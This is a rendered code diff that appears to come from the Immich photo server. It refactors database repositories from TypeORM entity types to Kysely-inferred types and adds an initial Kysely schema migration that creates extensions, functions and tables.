.where('assets.updatedAt', '>', options.updatedAfter)
|
.where('assets.updatedAt', '>', options.updatedAfter)
|
||||||
.limit(options.limit)
|
.limit(options.limit)
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
async upsertFile(file: Pick<Insertable<AssetFiles>, 'assetId' | 'path' | 'type'>): Promise<void> {
|
async upsertFile(file: Pick<Insertable<AssetFiles>, 'assetId' | 'path' | 'type'>): Promise<void> {
|
||||||
|
@ -2,7 +2,6 @@ import { Injectable } from '@nestjs/common';
|
|||||||
import AsyncLock from 'async-lock';
|
import AsyncLock from 'async-lock';
|
||||||
import { FileMigrationProvider, Kysely, Migrator, sql, Transaction } from 'kysely';
|
import { FileMigrationProvider, Kysely, Migrator, sql, Transaction } from 'kysely';
|
||||||
import { InjectKysely } from 'nestjs-kysely';
|
import { InjectKysely } from 'nestjs-kysely';
|
||||||
import { existsSync } from 'node:fs';
|
|
||||||
import { readdir } from 'node:fs/promises';
|
import { readdir } from 'node:fs/promises';
|
||||||
import { join } from 'node:path';
|
import { join } from 'node:path';
|
||||||
import semver from 'semver';
|
import semver from 'semver';
|
||||||
@ -197,31 +196,23 @@ export class DatabaseRepository {
|
|||||||
return dimSize;
|
return dimSize;
|
||||||
}
|
}
|
||||||
|
|
||||||
async runMigrations(options?: { transaction?: 'all' | 'none' | 'each'; only?: 'kysely' | 'typeorm' }): Promise<void> {
|
async runMigrations(options?: { transaction?: 'all' | 'none' | 'each' }): Promise<void> {
|
||||||
const { database } = this.configRepository.getEnv();
|
const { database } = this.configRepository.getEnv();
|
||||||
if (options?.only !== 'kysely') {
|
|
||||||
const dataSource = new DataSource(database.config.typeorm);
|
|
||||||
|
|
||||||
this.logger.log('Running migrations, this may take a while');
|
this.logger.log('Running migrations, this may take a while');
|
||||||
|
|
||||||
|
const tableExists = sql<{ result: string | null }>`select to_regclass('migrations') as "result"`;
|
||||||
|
const { rows } = await tableExists.execute(this.db);
|
||||||
|
const hasTypeOrmMigrations = !!rows[0]?.result;
|
||||||
|
if (hasTypeOrmMigrations) {
|
||||||
this.logger.debug('Running typeorm migrations');
|
this.logger.debug('Running typeorm migrations');
|
||||||
|
const dataSource = new DataSource(database.config.typeorm);
|
||||||
await dataSource.initialize();
|
await dataSource.initialize();
|
||||||
await dataSource.runMigrations(options);
|
await dataSource.runMigrations(options);
|
||||||
await dataSource.destroy();
|
await dataSource.destroy();
|
||||||
|
|
||||||
this.logger.debug('Finished running typeorm migrations');
|
this.logger.debug('Finished running typeorm migrations');
|
||||||
}
|
}
|
||||||
|
|
||||||
if (options?.only !== 'typeorm') {
|
|
||||||
// eslint-disable-next-line unicorn/prefer-module
|
|
||||||
const migrationFolder = join(__dirname, '..', 'schema/migrations');
|
|
||||||
|
|
||||||
// TODO remove after we have at least one kysely migration
|
|
||||||
if (!existsSync(migrationFolder)) {
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
this.logger.debug('Running kysely migrations');
|
this.logger.debug('Running kysely migrations');
|
||||||
const migrator = new Migrator({
|
const migrator = new Migrator({
|
||||||
db: this.db,
|
db: this.db,
|
||||||
@ -230,7 +221,8 @@ export class DatabaseRepository {
|
|||||||
provider: new FileMigrationProvider({
|
provider: new FileMigrationProvider({
|
||||||
fs: { readdir },
|
fs: { readdir },
|
||||||
path: { join },
|
path: { join },
|
||||||
migrationFolder,
|
// eslint-disable-next-line unicorn/prefer-module
|
||||||
|
migrationFolder: join(__dirname, '..', 'schema/migrations'),
|
||||||
}),
|
}),
|
||||||
});
|
});
|
||||||
|
|
||||||
@ -253,7 +245,6 @@ export class DatabaseRepository {
|
|||||||
|
|
||||||
this.logger.debug('Finished running kysely migrations');
|
this.logger.debug('Finished running kysely migrations');
|
||||||
}
|
}
|
||||||
}
|
|
||||||
|
|
||||||
async withLock<R>(lock: DatabaseLock, callback: () => Promise<R>): Promise<R> {
|
async withLock<R>(lock: DatabaseLock, callback: () => Promise<R>): Promise<R> {
|
||||||
let res;
|
let res;
|
||||||
|
@ -74,11 +74,21 @@ export class MyConsoleLogger extends ConsoleLogger {
|
|||||||
export class LoggingRepository {
|
export class LoggingRepository {
|
||||||
private logger: MyConsoleLogger;
|
private logger: MyConsoleLogger;
|
||||||
|
|
||||||
constructor(@Inject(ClsService) cls: ClsService | undefined, configRepository: ConfigRepository) {
|
constructor(
|
||||||
const { noColor } = configRepository.getEnv();
|
@Inject(ClsService) cls: ClsService | undefined,
|
||||||
|
@Inject(ConfigRepository) configRepository: ConfigRepository | undefined,
|
||||||
|
) {
|
||||||
|
let noColor = false;
|
||||||
|
if (configRepository) {
|
||||||
|
noColor = configRepository.getEnv().noColor;
|
||||||
|
}
|
||||||
this.logger = new MyConsoleLogger(cls, { context: LoggingRepository.name, color: !noColor });
|
this.logger = new MyConsoleLogger(cls, { context: LoggingRepository.name, color: !noColor });
|
||||||
}
|
}
|
||||||
|
|
||||||
|
static create() {
|
||||||
|
return new LoggingRepository(undefined, undefined);
|
||||||
|
}
|
||||||
|
|
||||||
setAppName(name: string): void {
|
setAppName(name: string): void {
|
||||||
appName = name.charAt(0).toUpperCase() + name.slice(1);
|
appName = name.charAt(0).toUpperCase() + name.slice(1);
|
||||||
}
|
}
|
||||||
|
@ -1,13 +1,12 @@
|
|||||||
import { Injectable } from '@nestjs/common';
|
import { Injectable } from '@nestjs/common';
|
||||||
import { Kysely, OrderByDirection, sql } from 'kysely';
|
import { Kysely, OrderByDirection, Selectable, sql } from 'kysely';
|
||||||
import { InjectKysely } from 'nestjs-kysely';
|
import { InjectKysely } from 'nestjs-kysely';
|
||||||
import { randomUUID } from 'node:crypto';
|
import { randomUUID } from 'node:crypto';
|
||||||
import { DB } from 'src/db';
|
import { DB, Exif } from 'src/db';
|
||||||
import { DummyValue, GenerateSql } from 'src/decorators';
|
import { DummyValue, GenerateSql } from 'src/decorators';
|
||||||
import { AssetEntity, searchAssetBuilder } from 'src/entities/asset.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetStatus, AssetType } from 'src/enum';
|
import { AssetStatus, AssetType } from 'src/enum';
|
||||||
import { anyUuid, asUuid } from 'src/utils/database';
|
import { anyUuid, asUuid, searchAssetBuilder } from 'src/utils/database';
|
||||||
import { Paginated } from 'src/utils/pagination';
|
|
||||||
import { isValidInteger } from 'src/validation';
|
import { isValidInteger } from 'src/validation';
|
||||||
|
|
||||||
export interface SearchResult<T> {
|
export interface SearchResult<T> {
|
||||||
@ -216,7 +215,7 @@ export class SearchRepository {
|
|||||||
},
|
},
|
||||||
],
|
],
|
||||||
})
|
})
|
||||||
async searchMetadata(pagination: SearchPaginationOptions, options: AssetSearchOptions): Paginated<AssetEntity> {
|
async searchMetadata(pagination: SearchPaginationOptions, options: AssetSearchOptions) {
|
||||||
const orderDirection = (options.orderDirection?.toLowerCase() || 'desc') as OrderByDirection;
|
const orderDirection = (options.orderDirection?.toLowerCase() || 'desc') as OrderByDirection;
|
||||||
const items = await searchAssetBuilder(this.db, options)
|
const items = await searchAssetBuilder(this.db, options)
|
||||||
.orderBy('assets.fileCreatedAt', orderDirection)
|
.orderBy('assets.fileCreatedAt', orderDirection)
|
||||||
@ -225,7 +224,7 @@ export class SearchRepository {
|
|||||||
.execute();
|
.execute();
|
||||||
const hasNextPage = items.length > pagination.size;
|
const hasNextPage = items.length > pagination.size;
|
||||||
items.splice(pagination.size);
|
items.splice(pagination.size);
|
||||||
return { items: items as any as AssetEntity[], hasNextPage };
|
return { items, hasNextPage };
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({
|
@GenerateSql({
|
||||||
@ -240,7 +239,7 @@ export class SearchRepository {
|
|||||||
},
|
},
|
||||||
],
|
],
|
||||||
})
|
})
|
||||||
async searchRandom(size: number, options: AssetSearchOptions): Promise<AssetEntity[]> {
|
async searchRandom(size: number, options: AssetSearchOptions) {
|
||||||
const uuid = randomUUID();
|
const uuid = randomUUID();
|
||||||
const builder = searchAssetBuilder(this.db, options);
|
const builder = searchAssetBuilder(this.db, options);
|
||||||
const lessThan = builder
|
const lessThan = builder
|
||||||
@ -251,8 +250,8 @@ export class SearchRepository {
|
|||||||
.where('assets.id', '>', uuid)
|
.where('assets.id', '>', uuid)
|
||||||
.orderBy(sql`random()`)
|
.orderBy(sql`random()`)
|
||||||
.limit(size);
|
.limit(size);
|
||||||
const { rows } = await sql`${lessThan} union all ${greaterThan} limit ${size}`.execute(this.db);
|
const { rows } = await sql<MapAsset>`${lessThan} union all ${greaterThan} limit ${size}`.execute(this.db);
|
||||||
return rows as any as AssetEntity[];
|
return rows;
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({
|
@GenerateSql({
|
||||||
@ -268,17 +267,17 @@ export class SearchRepository {
|
|||||||
},
|
},
|
||||||
],
|
],
|
||||||
})
|
})
|
||||||
async searchSmart(pagination: SearchPaginationOptions, options: SmartSearchOptions): Paginated<AssetEntity> {
|
async searchSmart(pagination: SearchPaginationOptions, options: SmartSearchOptions) {
|
||||||
if (!isValidInteger(pagination.size, { min: 1, max: 1000 })) {
|
if (!isValidInteger(pagination.size, { min: 1, max: 1000 })) {
|
||||||
throw new Error(`Invalid value for 'size': ${pagination.size}`);
|
throw new Error(`Invalid value for 'size': ${pagination.size}`);
|
||||||
}
|
}
|
||||||
|
|
||||||
const items = (await searchAssetBuilder(this.db, options)
|
const items = await searchAssetBuilder(this.db, options)
|
||||||
.innerJoin('smart_search', 'assets.id', 'smart_search.assetId')
|
.innerJoin('smart_search', 'assets.id', 'smart_search.assetId')
|
||||||
.orderBy(sql`smart_search.embedding <=> ${options.embedding}`)
|
.orderBy(sql`smart_search.embedding <=> ${options.embedding}`)
|
||||||
.limit(pagination.size + 1)
|
.limit(pagination.size + 1)
|
||||||
.offset((pagination.page - 1) * pagination.size)
|
.offset((pagination.page - 1) * pagination.size)
|
||||||
.execute()) as any as AssetEntity[];
|
.execute();
|
||||||
|
|
||||||
const hasNextPage = items.length > pagination.size;
|
const hasNextPage = items.length > pagination.size;
|
||||||
items.splice(pagination.size);
|
items.splice(pagination.size);
|
||||||
@ -392,7 +391,7 @@ export class SearchRepository {
|
|||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [[DummyValue.UUID]] })
|
@GenerateSql({ params: [[DummyValue.UUID]] })
|
||||||
getAssetsByCity(userIds: string[]): Promise<AssetEntity[]> {
|
getAssetsByCity(userIds: string[]) {
|
||||||
return this.db
|
return this.db
|
||||||
.withRecursive('cte', (qb) => {
|
.withRecursive('cte', (qb) => {
|
||||||
const base = qb
|
const base = qb
|
||||||
@ -434,9 +433,14 @@ export class SearchRepository {
|
|||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
.innerJoin('cte', 'assets.id', 'cte.assetId')
|
.innerJoin('cte', 'assets.id', 'cte.assetId')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
.select((eb) => eb.fn('to_jsonb', [eb.table('exif')]).as('exifInfo'))
|
.select((eb) =>
|
||||||
|
eb
|
||||||
|
.fn('to_jsonb', [eb.table('exif')])
|
||||||
|
.$castTo<Selectable<Exif>>()
|
||||||
|
.as('exifInfo'),
|
||||||
|
)
|
||||||
.orderBy('exif.city')
|
.orderBy('exif.city')
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
async upsert(assetId: string, embedding: string): Promise<void> {
|
async upsert(assetId: string, embedding: string): Promise<void> {
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
import { Injectable } from '@nestjs/common';
|
import { Injectable } from '@nestjs/common';
|
||||||
import { Insertable, Kysely, sql, Updateable } from 'kysely';
|
import { Insertable, Kysely, NotNull, sql, Updateable } from 'kysely';
|
||||||
import { jsonObjectFrom } from 'kysely/helpers/postgres';
|
import { jsonObjectFrom } from 'kysely/helpers/postgres';
|
||||||
import _ from 'lodash';
|
import _ from 'lodash';
|
||||||
import { InjectKysely } from 'nestjs-kysely';
|
import { InjectKysely } from 'nestjs-kysely';
|
||||||
import { columns } from 'src/database';
|
import { Album, columns } from 'src/database';
|
||||||
import { DB, SharedLinks } from 'src/db';
|
import { DB, SharedLinks } from 'src/db';
|
||||||
import { DummyValue, GenerateSql } from 'src/decorators';
|
import { DummyValue, GenerateSql } from 'src/decorators';
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { SharedLinkType } from 'src/enum';
|
import { SharedLinkType } from 'src/enum';
|
||||||
|
|
||||||
export type SharedLinkSearchOptions = {
|
export type SharedLinkSearchOptions = {
|
||||||
@ -19,7 +19,7 @@ export class SharedLinkRepository {
|
|||||||
constructor(@InjectKysely() private db: Kysely<DB>) {}
|
constructor(@InjectKysely() private db: Kysely<DB>) {}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID, DummyValue.UUID] })
|
||||||
get(userId: string, id: string): Promise<SharedLinkEntity | undefined> {
|
get(userId: string, id: string) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('shared_links')
|
.selectFrom('shared_links')
|
||||||
.selectAll('shared_links')
|
.selectAll('shared_links')
|
||||||
@ -87,18 +87,23 @@ export class SharedLinkRepository {
|
|||||||
.as('album'),
|
.as('album'),
|
||||||
(join) => join.onTrue(),
|
(join) => join.onTrue(),
|
||||||
)
|
)
|
||||||
.select((eb) => eb.fn.coalesce(eb.fn.jsonAgg('a').filterWhere('a.id', 'is not', null), sql`'[]'`).as('assets'))
|
.select((eb) =>
|
||||||
|
eb.fn
|
||||||
|
.coalesce(eb.fn.jsonAgg('a').filterWhere('a.id', 'is not', null), sql`'[]'`)
|
||||||
|
.$castTo<MapAsset[]>()
|
||||||
|
.as('assets'),
|
||||||
|
)
|
||||||
.groupBy(['shared_links.id', sql`"album".*`])
|
.groupBy(['shared_links.id', sql`"album".*`])
|
||||||
.select((eb) => eb.fn.toJson('album').as('album'))
|
.select((eb) => eb.fn.toJson('album').$castTo<Album | null>().as('album'))
|
||||||
.where('shared_links.id', '=', id)
|
.where('shared_links.id', '=', id)
|
||||||
.where('shared_links.userId', '=', userId)
|
.where('shared_links.userId', '=', userId)
|
||||||
.where((eb) => eb.or([eb('shared_links.type', '=', SharedLinkType.INDIVIDUAL), eb('album.id', 'is not', null)]))
|
.where((eb) => eb.or([eb('shared_links.type', '=', SharedLinkType.INDIVIDUAL), eb('album.id', 'is not', null)]))
|
||||||
.orderBy('shared_links.createdAt', 'desc')
|
.orderBy('shared_links.createdAt', 'desc')
|
||||||
.executeTakeFirst() as Promise<SharedLinkEntity | undefined>;
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [{ userId: DummyValue.UUID, albumId: DummyValue.UUID }] })
|
@GenerateSql({ params: [{ userId: DummyValue.UUID, albumId: DummyValue.UUID }] })
|
||||||
getAll({ userId, albumId }: SharedLinkSearchOptions): Promise<SharedLinkEntity[]> {
|
getAll({ userId, albumId }: SharedLinkSearchOptions) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('shared_links')
|
.selectFrom('shared_links')
|
||||||
.selectAll('shared_links')
|
.selectAll('shared_links')
|
||||||
@ -115,6 +120,7 @@ export class SharedLinkRepository {
|
|||||||
(join) => join.onTrue(),
|
(join) => join.onTrue(),
|
||||||
)
|
)
|
||||||
.select('assets.assets')
|
.select('assets.assets')
|
||||||
|
.$narrowType<{ assets: NotNull }>()
|
||||||
.leftJoinLateral(
|
.leftJoinLateral(
|
||||||
(eb) =>
|
(eb) =>
|
||||||
eb
|
eb
|
||||||
@ -152,12 +158,12 @@ export class SharedLinkRepository {
|
|||||||
.as('album'),
|
.as('album'),
|
||||||
(join) => join.onTrue(),
|
(join) => join.onTrue(),
|
||||||
)
|
)
|
||||||
.select((eb) => eb.fn.toJson('album').as('album'))
|
.select((eb) => eb.fn.toJson('album').$castTo<Album | null>().as('album'))
|
||||||
.where((eb) => eb.or([eb('shared_links.type', '=', SharedLinkType.INDIVIDUAL), eb('album.id', 'is not', null)]))
|
.where((eb) => eb.or([eb('shared_links.type', '=', SharedLinkType.INDIVIDUAL), eb('album.id', 'is not', null)]))
|
||||||
.$if(!!albumId, (eb) => eb.where('shared_links.albumId', '=', albumId!))
|
.$if(!!albumId, (eb) => eb.where('shared_links.albumId', '=', albumId!))
|
||||||
.orderBy('shared_links.createdAt', 'desc')
|
.orderBy('shared_links.createdAt', 'desc')
|
||||||
.distinctOn(['shared_links.createdAt'])
|
.distinctOn(['shared_links.createdAt'])
|
||||||
.execute() as unknown as Promise<SharedLinkEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.BUFFER] })
|
@GenerateSql({ params: [DummyValue.BUFFER] })
|
||||||
@ -177,7 +183,7 @@ export class SharedLinkRepository {
|
|||||||
.executeTakeFirst();
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
async create(entity: Insertable<SharedLinks> & { assetIds?: string[] }): Promise<SharedLinkEntity> {
|
async create(entity: Insertable<SharedLinks> & { assetIds?: string[] }) {
|
||||||
const { id } = await this.db
|
const { id } = await this.db
|
||||||
.insertInto('shared_links')
|
.insertInto('shared_links')
|
||||||
.values(_.omit(entity, 'assetIds'))
|
.values(_.omit(entity, 'assetIds'))
|
||||||
@ -194,7 +200,7 @@ export class SharedLinkRepository {
|
|||||||
return this.getSharedLinks(id);
|
return this.getSharedLinks(id);
|
||||||
}
|
}
|
||||||
|
|
||||||
async update(entity: Updateable<SharedLinks> & { id: string; assetIds?: string[] }): Promise<SharedLinkEntity> {
|
async update(entity: Updateable<SharedLinks> & { id: string; assetIds?: string[] }) {
|
||||||
const { id } = await this.db
|
const { id } = await this.db
|
||||||
.updateTable('shared_links')
|
.updateTable('shared_links')
|
||||||
.set(_.omit(entity, 'assets', 'album', 'assetIds'))
|
.set(_.omit(entity, 'assets', 'album', 'assetIds'))
|
||||||
@ -212,8 +218,8 @@ export class SharedLinkRepository {
|
|||||||
return this.getSharedLinks(id);
|
return this.getSharedLinks(id);
|
||||||
}
|
}
|
||||||
|
|
||||||
async remove(entity: SharedLinkEntity): Promise<void> {
|
async remove(id: string): Promise<void> {
|
||||||
await this.db.deleteFrom('shared_links').where('shared_links.id', '=', entity.id).execute();
|
await this.db.deleteFrom('shared_links').where('shared_links.id', '=', id).execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
private getSharedLinks(id: string) {
|
private getSharedLinks(id: string) {
|
||||||
@ -236,9 +242,12 @@ export class SharedLinkRepository {
|
|||||||
(join) => join.onTrue(),
|
(join) => join.onTrue(),
|
||||||
)
|
)
|
||||||
.select((eb) =>
|
.select((eb) =>
|
||||||
eb.fn.coalesce(eb.fn.jsonAgg('assets').filterWhere('assets.id', 'is not', null), sql`'[]'`).as('assets'),
|
eb.fn
|
||||||
|
.coalesce(eb.fn.jsonAgg('assets').filterWhere('assets.id', 'is not', null), sql`'[]'`)
|
||||||
|
.$castTo<MapAsset[]>()
|
||||||
|
.as('assets'),
|
||||||
)
|
)
|
||||||
.groupBy('shared_links.id')
|
.groupBy('shared_links.id')
|
||||||
.executeTakeFirstOrThrow() as Promise<SharedLinkEntity>;
|
.executeTakeFirstOrThrow();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -5,7 +5,6 @@ import { InjectKysely } from 'nestjs-kysely';
|
|||||||
import { columns } from 'src/database';
|
import { columns } from 'src/database';
|
||||||
import { AssetStack, DB } from 'src/db';
|
import { AssetStack, DB } from 'src/db';
|
||||||
import { DummyValue, GenerateSql } from 'src/decorators';
|
import { DummyValue, GenerateSql } from 'src/decorators';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { asUuid } from 'src/utils/database';
|
import { asUuid } from 'src/utils/database';
|
||||||
|
|
||||||
export interface StackSearch {
|
export interface StackSearch {
|
||||||
@ -36,9 +35,7 @@ const withAssets = (eb: ExpressionBuilder<DB, 'asset_stack'>, withTags = false)
|
|||||||
.select((eb) => eb.fn.toJson('exifInfo').as('exifInfo'))
|
.select((eb) => eb.fn.toJson('exifInfo').as('exifInfo'))
|
||||||
.where('assets.deletedAt', 'is', null)
|
.where('assets.deletedAt', 'is', null)
|
||||||
.whereRef('assets.stackId', '=', 'asset_stack.id'),
|
.whereRef('assets.stackId', '=', 'asset_stack.id'),
|
||||||
)
|
).as('assets');
|
||||||
.$castTo<AssetEntity[]>()
|
|
||||||
.as('assets');
|
|
||||||
};
|
};
|
||||||
|
|
||||||
@Injectable()
|
@Injectable()
|
||||||
|
@ -2,8 +2,7 @@ import { Kysely } from 'kysely';
|
|||||||
import { InjectKysely } from 'nestjs-kysely';
|
import { InjectKysely } from 'nestjs-kysely';
|
||||||
import { DB } from 'src/db';
|
import { DB } from 'src/db';
|
||||||
import { DummyValue, GenerateSql } from 'src/decorators';
|
import { DummyValue, GenerateSql } from 'src/decorators';
|
||||||
import { withExif } from 'src/entities/asset.entity';
|
import { asUuid, withExif } from 'src/utils/database';
|
||||||
import { asUuid } from 'src/utils/database';
|
|
||||||
|
|
||||||
export class ViewRepository {
|
export class ViewRepository {
|
||||||
constructor(@InjectKysely() private db: Kysely<DB>) {}
|
constructor(@InjectKysely() private db: Kysely<DB>) {}
|
||||||
|
410
server/src/schema/migrations/1744910873969-InitialMigration.ts
Normal file
410
server/src/schema/migrations/1744910873969-InitialMigration.ts
Normal file
@ -0,0 +1,410 @@
|
|||||||
|
import { Kysely, sql } from 'kysely';
|
||||||
|
import { DatabaseExtension } from 'src/enum';
|
||||||
|
import { ConfigRepository } from 'src/repositories/config.repository';
|
||||||
|
import { LoggingRepository } from 'src/repositories/logging.repository';
|
||||||
|
|
||||||
|
const vectorExtension = new ConfigRepository().getEnv().database.vectorExtension;
|
||||||
|
const lastMigrationSql = sql<{ name: string }>`SELECT "name" FROM "migrations" ORDER BY "timestamp" DESC LIMIT 1;`;
|
||||||
|
const tableExists = sql<{ result: string | null }>`select to_regclass('migrations') as "result"`;
|
||||||
|
const logger = LoggingRepository.create();
|
||||||
|
|
||||||
|
export async function up(db: Kysely<any>): Promise<void> {
|
||||||
|
const { rows } = await tableExists.execute(db);
|
||||||
|
const hasTypeOrmMigrations = !!rows[0]?.result;
|
||||||
|
if (hasTypeOrmMigrations) {
|
||||||
|
const {
|
||||||
|
rows: [lastMigration],
|
||||||
|
} = await lastMigrationSql.execute(db);
|
||||||
|
if (lastMigration?.name !== 'AddMissingIndex1744910873956') {
|
||||||
|
throw new Error(
|
||||||
|
'Invalid upgrade path. For more information, see https://immich.app/errors#typeorm-upgrade',
|
||||||
|
);
|
||||||
|
}
|
||||||
|
logger.log('Database has up to date TypeORM migrations, skipping initial Kysely migration');
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
await sql`CREATE EXTENSION IF NOT EXISTS "uuid-ossp";`.execute(db);
|
||||||
|
await sql`CREATE EXTENSION IF NOT EXISTS "unaccent";`.execute(db);
|
||||||
|
await sql`CREATE EXTENSION IF NOT EXISTS "cube";`.execute(db);
|
||||||
|
await sql`CREATE EXTENSION IF NOT EXISTS "earthdistance";`.execute(db);
|
||||||
|
await sql`CREATE EXTENSION IF NOT EXISTS "pg_trgm";`.execute(db);
|
||||||
|
await sql`CREATE EXTENSION IF NOT EXISTS "vectors";`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION immich_uuid_v7(p_timestamp timestamp with time zone default clock_timestamp())
|
||||||
|
RETURNS uuid
|
||||||
|
VOLATILE LANGUAGE SQL
|
||||||
|
AS $$
|
||||||
|
select encode(
|
||||||
|
set_bit(
|
||||||
|
set_bit(
|
||||||
|
overlay(uuid_send(gen_random_uuid())
|
||||||
|
placing substring(int8send(floor(extract(epoch from p_timestamp) * 1000)::bigint) from 3)
|
||||||
|
from 1 for 6
|
||||||
|
),
|
||||||
|
52, 1
|
||||||
|
),
|
||||||
|
53, 1
|
||||||
|
),
|
||||||
|
'hex')::uuid;
|
||||||
|
$$;`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION updated_at()
|
||||||
|
RETURNS TRIGGER
|
||||||
|
LANGUAGE PLPGSQL
|
||||||
|
AS $$
|
||||||
|
DECLARE
|
||||||
|
clock_timestamp TIMESTAMP := clock_timestamp();
|
||||||
|
BEGIN
|
||||||
|
new."updatedAt" = clock_timestamp;
|
||||||
|
new."updateId" = immich_uuid_v7(clock_timestamp);
|
||||||
|
return new;
|
||||||
|
END;
|
||||||
|
$$;`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION f_concat_ws(text, text[])
|
||||||
|
RETURNS text
|
||||||
|
PARALLEL SAFE IMMUTABLE LANGUAGE SQL
|
||||||
|
AS $$SELECT array_to_string($2, $1)$$;`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION f_unaccent(text)
|
||||||
|
RETURNS text
|
||||||
|
PARALLEL SAFE STRICT IMMUTABLE LANGUAGE SQL
|
||||||
|
RETURN unaccent('unaccent', $1)`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION ll_to_earth_public(latitude double precision, longitude double precision)
|
||||||
|
RETURNS public.earth
|
||||||
|
PARALLEL SAFE STRICT IMMUTABLE LANGUAGE SQL
|
||||||
|
AS $$
|
||||||
|
SELECT public.cube(public.cube(public.cube(public.earth()*cos(radians(latitude))*cos(radians(longitude))),public.earth()*cos(radians(latitude))*sin(radians(longitude))),public.earth()*sin(radians(latitude)))::public.earth
|
||||||
|
$$;`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION users_delete_audit()
|
||||||
|
RETURNS TRIGGER
|
||||||
|
LANGUAGE PLPGSQL
|
||||||
|
AS $$
|
||||||
|
BEGIN
|
||||||
|
INSERT INTO users_audit ("userId")
|
||||||
|
SELECT "id"
|
||||||
|
FROM OLD;
|
||||||
|
RETURN NULL;
|
||||||
|
END;
|
||||||
|
$$;`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION partners_delete_audit()
|
||||||
|
RETURNS TRIGGER
|
||||||
|
LANGUAGE PLPGSQL
|
||||||
|
AS $$
|
||||||
|
BEGIN
|
||||||
|
INSERT INTO partners_audit ("sharedById", "sharedWithId")
|
||||||
|
SELECT "sharedById", "sharedWithId"
|
||||||
|
FROM OLD;
|
||||||
|
RETURN NULL;
|
||||||
|
END;
|
||||||
|
$$;`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE FUNCTION assets_delete_audit()
|
||||||
|
RETURNS TRIGGER
|
||||||
|
LANGUAGE PLPGSQL
|
||||||
|
AS $$
|
||||||
|
BEGIN
|
||||||
|
INSERT INTO assets_audit ("assetId", "ownerId")
|
||||||
|
SELECT "id", "ownerId"
|
||||||
|
FROM OLD;
|
||||||
|
RETURN NULL;
|
||||||
|
END;
|
||||||
|
$$;`.execute(db);
|
||||||
|
if (vectorExtension === DatabaseExtension.VECTORS) {
|
||||||
|
await sql`SET search_path TO "$user", public, vectors`.execute(db);
|
||||||
|
await sql`SET vectors.pgvector_compatibility=on`.execute(db);
|
||||||
|
}
|
||||||
|
await sql`CREATE TYPE "assets_status_enum" AS ENUM ('active','trashed','deleted');`.execute(db);
|
||||||
|
await sql`CREATE TYPE "sourcetype" AS ENUM ('machine-learning','exif','manual');`.execute(db);
|
||||||
|
await sql`CREATE TABLE "users" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "email" character varying NOT NULL, "password" character varying NOT NULL DEFAULT '', "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "profileImagePath" character varying NOT NULL DEFAULT '', "isAdmin" boolean NOT NULL DEFAULT false, "shouldChangePassword" boolean NOT NULL DEFAULT true, "deletedAt" timestamp with time zone, "oauthId" character varying NOT NULL DEFAULT '', "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "storageLabel" character varying, "name" character varying NOT NULL DEFAULT '', "quotaSizeInBytes" bigint, "quotaUsageInBytes" bigint NOT NULL DEFAULT 0, "status" character varying NOT NULL DEFAULT 'active', "profileChangedAt" timestamp with time zone NOT NULL DEFAULT now(), "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "libraries" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "name" character varying NOT NULL, "ownerId" uuid NOT NULL, "importPaths" text[] NOT NULL, "exclusionPatterns" text[] NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "deletedAt" timestamp with time zone, "refreshedAt" timestamp with time zone, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
|
||||||
|
await sql`CREATE TABLE "asset_stack" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "primaryAssetId" uuid NOT NULL, "ownerId" uuid NOT NULL);`.execute(db);
|
||||||
|
